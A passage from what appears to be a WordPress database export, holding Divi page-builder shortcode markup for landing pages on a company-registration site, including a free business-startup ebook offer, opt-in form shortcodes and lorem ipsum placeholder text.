parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding=\"0px||180px|\" padding_2_last_edited=\"on|phone\" custom_padding_last_edited=\"on|phone\" custom_padding_tablet=\"0px||100px|\" padding_top_1=\"10%\" padding_right_1=\"10%\" padding_bottom_1=\"10%\" padding_left_1=\"10%\" padding_1_phone=\"10%|10%|0%|10%\" padding_1_last_edited=\"on|desktop\" custom_padding_phone=\"0px|||\"][et_pb_column type=\"1_2\"][et_pb_divider admin_label=\"Divider Desktop\" color=\"#c1c1c1\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||margin-top:-17%;\" height=\"19\" disabled=\"off\" disabled_on=\"on|on|\"]\n\n\n\n[/et_pb_divider][et_pb_divider admin_label=\"Divider Mobile\" color=\"#c1c1c1\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||\" height=\"19\" disabled=\"off\" disabled_on=\"||on\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"52\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\" max_width=\"440px\" text_font_size_last_edited=\"on|tablet\" text_font_size_phone=\"30\" text_font_size_tablet=\"36\"]\n\n<p>Better design for your content.</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"20\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"28px||8%|\" custom_css_main_element=\"font-weight:300;\" max_width=\"450px\" text_line_height=\"1.5em\"]\n\n<p>Build beautiful websites thanks to a modular content blocks that makes customization easy and enjoyable. Get your free copy today.</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||on\" text_font_size=\"16\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"48px|||\" text_line_height=\"1.1em\" text_letter_spacing=\"1px\" text_font_size_last_edited=\"on|phone\" text_font_size_phone=\"12\" custom_margin_last_edited=\"on|phone\" custom_margin_phone=\"48px||50px|\"]\n\n<p>LEARN MORE</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/073.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"right\" sticky=\"on\" align=\"right\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"|0px|180px|\" custom_margin_phone=\"60px|0px|100px|\" custom_margin_last_edited=\"on|desktop\"]\n\n\n\n[/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"#6\" transparent_background=\"off\" background_color=\"#ede7f6\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" custom_css_main_element=\"border-top: 1px solid #7E57C2;\" collapsed=\"off\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/08/081.jpg\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"120px||80px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_width_px=\"540px\" custom_padding_phone=\"41px||40px|\" custom_padding_last_edited=\"on|desktop\"][et_pb_column type=\"4_4\"][et_pb_divider admin_label=\"Divider Desktop\" color=\"rgba(255,255,255,0.3)\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"center\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||margin-left: 47%;||margin-right: 47%;||\" height=\"19\" disabled=\"off\" disabled_on=\"on|on|\"]\n\n\n\n[/et_pb_divider][et_pb_divider admin_label=\"Divider Mobile\" color=\"rgba(255,255,255,0.3)\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"center\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||margin-left: 44%;||margin-right: 44%;||\" height=\"19\" disabled=\"off\" disabled_on=\"||on\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"52\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"38px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\" text_font_size_last_edited=\"on|phone\" text_font_size_phone=\"30\" text_font_size_tablet=\"46\"]\n\n<p>Happy customers.</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"20\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"18px||0px|\" custom_css_main_element=\"font-weight:300;\" max_width=\"540px\" text_line_height=\"1.5em\"]\n\n<p>Curabitur non nisi nec velit at tempor vulputate acut. Cras nec augue sit amet orci condimentum.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" custom_width_px=\"370px\" use_custom_gutter=\"on\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_margin=\"43px|||\" custom_padding=\"0px||80px|\" custom_padding_last_edited=\"on|desktop\" custom_margin_last_edited=\"on|phone\" custom_padding_phone=\"0px||40px|\" custom_margin_phone=\"10px|||\" parallax_2=\"off\" parallax_method_2=\"off\" parallax_3=\"off\" parallax_method_3=\"off\" parallax_4=\"off\" parallax_method_4=\"off\" gutter_width=\"2\"][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/092.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"off\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/102.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"off\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"-10px|||\" custom_margin_last_edited=\"on|phone\" custom_margin_phone=\"0px|||\"]\n\n\n\n[/et_pb_image][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/112.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"off\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/122.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"off\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" custom_width_px=\"370px\" use_custom_gutter=\"on\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_margin=\"43px|||\" custom_padding=\"0px||9.5%|\" custom_padding_last_edited=\"on|phone\" custom_margin_last_edited=\"on|phone\" custom_padding_phone=\"0px||50px|\" custom_margin_phone=\"10px|||\" parallax_2=\"off\" parallax_method_2=\"off\" parallax_3=\"off\" parallax_method_3=\"off\" parallax_4=\"off\" parallax_method_4=\"off\"][et_pb_column type=\"4_4\"][et_pb_button admin_label=\"Button\" button_url=\"#\" url_new_window=\"off\" button_text=\"BUTTON\" button_alignment=\"center\" background_layout=\"light\" custom_button=\"on\" button_text_size=\"13\" button_text_color=\"#ffffff\" button_bg_color=\"#41bb99\" button_border_width=\"0\" button_border_color=\"#41bb99\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"#41bb99\" button_border_color_hover=\"#41bb99\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" custom_css_before=\"display: none !important;\" custom_css_main_element=\"padding-top: 15px !important;||padding-right: 38px !important;||padding-bottom: 14px !important;||padding-left: 38px !important;||||font-weight:700;\"]\n\n\n\n[/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section]','Landing Page #1','','publish','closed','closed','','landing-page-1-3','','','2016-08-19 02:18:33','2016-08-19 00:18:33','',0,'https://companyregistration.online/et_pb_layout/landing-page-1-3/',0,'et_pb_layout','',0),(27843,1,'2016-09-10 14:39:45','2016-09-10 12:39:45','','free-report-cover-coregadwords50off','','inherit','open','closed','','free-report-cover-coregadwords50off','','','2016-09-10 14:39:45','2016-09-10 12:39:45','',0,'https://companyregistration.online/wp-content/uploads/2016/09/Free-Report-cover-CoRegAdwords50off.png',0,'attachment','image/png',0),(27847,1,'2016-09-10 14:49:22','2016-09-10 12:49:22','<!-- wp:divi/placeholder -->\n[et_pb_section][et_pb_row][et_pb_column type=\"4_4\"][et_pb_text][et_bloom_inline optin_id=optin_4][/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]\n<!-- /wp:divi/placeholder -->','50% off + Free ebook','','publish','closed','closed','','50-off-free-ebook','','','2018-12-12 11:53:05','2018-12-12 09:53:05','',0,'https://companyregistration.online/?page_id=27847',0,'page','',0),(27858,1,'2016-10-16 14:30:25','2016-10-16 12:30:25','[et_pb_section admin_label=\"#1 Hero Section\" transparent_background=\"off\" background_color=\"#ede7f6\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" collapsed=\"off\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/08/01.jpg\"][et_pb_row admin_label=\"row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"||0px|\" padding_mobile=\"on\" custom_margin=\"8%||10%|\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"1_2\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"24\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||0px|\" custom_css_main_element=\"font-weight:300;\"]\r\n\r\nFree Ebook \"What I Need To Know before I Start My Business\"\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"64\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\" max_width=\"98%\" text_font_size_last_edited=\"on|desktop\" text_font_size_phone=\"36\"]\r\n\r\nln business leaping without knowledge or insight is suicidal\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/021.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"left\" sticky=\"off\" align=\"left\" disabled=\"off\" disabled_on=\"||on\" max_width=\"90%\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"10%|||\"] [/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"#1.1 Hero Section\" fullwidth=\"off\" specialty=\"off\" collapsed=\"off\" transparent_background=\"off\" background_color=\"#563a82\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding=\"0px|||\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"1_2\"][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_image admin_label=\"Mockup Overlap\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/02.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"bottom\" sticky=\"on\" align=\"right\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"-100%|||\" disabled=\"off\" disabled_on=\"on|on|\" max_width=\"80%\" custom_margin_last_edited=\"on|desktop\" custom_margin_tablet=\"-66%|||\"] [/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"] [et_bloom_inline optin_id=optin_5] [/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"#14 Features\" fullwidth=\"off\" specialty=\"off\" collapsed=\"off\" transparent_background=\"off\" background_color=\"#563a82\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"0px|||\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding_last_edited=\"on|tablet\"][et_pb_column type=\"1_2\"][et_pb_divider admin_label=\"Divider Desktop\" color=\"#8975a7\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||margin-top:-17%;||\" height=\"19\" disabled=\"off\" disabled_on=\"on|on|\"] [/et_pb_divider][et_pb_divider admin_label=\"Divider Mobile\" color=\"#8975a7\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||\" height=\"19\" disabled=\"off\" disabled_on=\"||on\"] [/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"52\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\" max_width=\"80%\" text_font_size_last_edited=\"on|phone\" text_font_size_phone=\"30\" text_font_size_tablet=\"46\"]\r\n\r\nA new era of websites is here.\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"20\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"18px||0px|\" custom_css_main_element=\"font-weight:300;\" max_width=\"98%\" text_line_height=\"1.5em\"]\r\n\r\nBuild beautiful Divi websites thanks to a modular content blocks that makes customization easy and enjoyable. Get your copy today.\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\"][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" gutter_width=\"4\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding=\"4.5%||0px|\"][et_pb_column type=\"1_2\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"32\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"18px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.3em\" text_font_size_last_edited=\"on|phone\" text_font_size_tablet=\"24\"]\r\n\r\n<img class=\" size-full wp-image-25874\" style=\"float: left; margin-top: 10px; margin-right: 33px; margin-bottom: 20px;\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/05-1.png\" alt=\"03\" width=\"70\" height=\"70\" />\r\n<div>\r\n<p style=\"padding-bottom: 0px;\">Save time and money</p>\r\n<p style=\"margin-top: 16px; font-size: 18px;\">Integer elementum massa at nulla placera. Suspendisse in libero risus, in massa.</p>\r\n\r\n</div>\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"32\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"18px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.3em\" text_font_size_last_edited=\"on|phone\" text_font_size_tablet=\"24\"]\r\n\r\n<img class=\" size-full wp-image-25874\" style=\"float: left; margin-top: 10px; margin-right: 33px; margin-bottom: 20px;\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/05-1.png\" alt=\"03\" width=\"70\" height=\"70\" />\r\n<div>\r\n<p style=\"padding-bottom: 0px;\">Beautiful layouts</p>\r\n<p style=\"margin-top: 16px; font-size: 18px;\">Integer elementum massa at nulla placera. Suspendisse in libero risus, in massa.</p>\r\n\r\n</div>\r\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" gutter_width=\"4\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding=\"5%||9%|\" custom_padding_phone=\"1%||9%|\" custom_padding_last_edited=\"on|desktop\"][et_pb_column type=\"1_2\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"32\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"18px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.3em\" text_font_size_last_edited=\"on|phone\" text_font_size_tablet=\"24\"]\r\n\r\n<img class=\" size-full wp-image-25874\" style=\"float: left; margin-top: 10px; margin-right: 33px; margin-bottom: 20px;\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/05-1.png\" alt=\"03\" width=\"70\" height=\"70\" />\r\n<div>\r\n<p style=\"padding-bottom: 0px;\">Huge components library</p>\r\n<p style=\"margin-top: 16px; font-size: 18px;\">Integer elementum massa at nulla placera. Suspendisse in libero risus, in massa.</p>\r\n\r\n</div>\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"32\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"18px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.3em\" text_font_size_last_edited=\"on|phone\" text_font_size_tablet=\"24\"]\r\n\r\n<img class=\" size-full wp-image-25874\" style=\"float: left; margin-top: 10px; margin-right: 33px; margin-bottom: 20px;\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/05-1.png\" alt=\"03\" width=\"70\" height=\"70\" />\r\n<div>\r\n<p style=\"padding-bottom: 0px;\">For freelancers and agencies</p>\r\n<p style=\"margin-top: 16px; font-size: 18px;\">Integer elementum massa at nulla placera. Suspendisse in libero risus, in massa.</p>\r\n\r\n</div>\r\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"#19 CTA\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" background_color=\"#563a82\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" custom_padding=\"0px||0px|\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" collapsed=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" padding_top_2=\"4%\" padding_right_2=\"10%\" padding_bottom_2=\"4%\" padding_left_2=\"10%\" column_padding_mobile=\"on\" custom_padding=\"0px||0px|\" padding_2_last_edited=\"on|tablet\" padding_2_phone=\"10%|10%|0px|10%\" custom_padding_last_edited=\"on|phone\" custom_padding_tablet=\"0px||100px|\"][et_pb_column type=\"1_2\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/04.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"on\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||0px|\"] [/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_divider admin_label=\"Divider Desktop\" color=\"#8975a7\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||margin-top:-17%;\" height=\"19\" disabled=\"off\" disabled_on=\"on|on|\"] [/et_pb_divider][et_pb_divider admin_label=\"Divider Mobile\" color=\"#8975a7\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||\" height=\"19\" disabled=\"off\" disabled_on=\"||on\"] [/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"52\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\" max_width=\"440px\" text_font_size_last_edited=\"on|tablet\" text_font_size_phone=\"30\" text_font_size_tablet=\"36\"]\r\n\r\nPowerful yet simple.\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"20\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"28px||0px|\" custom_css_main_element=\"font-weight:300;\" max_width=\"450px\" text_line_height=\"1.5em\"]\r\n\r\nDonec laoreet volutpat molestie. Praesent a tempus dictum nibh ac ullamcorper. Sed eu consequat nisi.Etiam est a feugiat dolor.\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||on\" text_font_size=\"16\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"8%|||\" text_line_height=\"1.1em\" text_letter_spacing=\"1px\" text_font_size_last_edited=\"on|phone\" text_font_size_phone=\"14\" custom_margin_tablet=\"4%|||\" custom_margin_last_edited=\"on|phone\" custom_margin_phone=\"8%|||\"]\r\n\r\nLEARN MORE\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"#21 CTA\" transparent_background=\"off\" background_color=\"#ede7f6\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" custom_padding=\"0px||0px|\" custom_css_main_element=\"border-top: 1px solid ;\" collapsed=\"off\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/08/07.jpg\"][et_pb_row admin_label=\"row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"0px||0px|\" padding_mobile=\"on\" custom_margin=\"8%||0px|\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding_phone=\"100px||0px|\" custom_padding_last_edited=\"on|desktop\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"24\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||0px|\" custom_css_main_element=\"font-weight:300;\"]\r\n\r\nA whole new experience\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"52\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||38px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\" max_width=\"60%\" text_font_size_last_edited=\"on|phone\" text_font_size_phone=\"36\" max_width_tablet=\"80%\" max_width_last_edited=\"on|phone\"]\r\n\r\nStart building superb websites today with Divi.\r\n\r\n[/et_pb_text][et_pb_button admin_label=\"Button\" button_url=\"#\" url_new_window=\"off\" button_text=\"BUTTON\" button_alignment=\"center\" background_layout=\"light\" custom_button=\"on\" button_text_size=\"13\" button_text_color=\"#202020\" button_bg_color=\"#ffffff\" button_border_width=\"0\" button_border_color=\"#ffffff\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" button_text_color_hover=\"#202020\" button_bg_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" custom_css_before=\"display: none !important;\" custom_css_main_element=\"padding-top: 15px !important;||padding-right: 38px !important;||padding-bottom: 14px !important;||padding-left: 38px !important;||||font-weight:700;\"] [/et_pb_button][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/06-1.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"on\" align=\"center\" max_width=\"90%\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"9%||0px|\" custom_margin_phone=\"14%||0px|\" custom_margin_last_edited=\"on|phone\"] [/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section]','LP Free Ebook 2','','publish','closed','closed','','lp-free-ebook','','','2016-10-16 16:11:04','2016-10-16 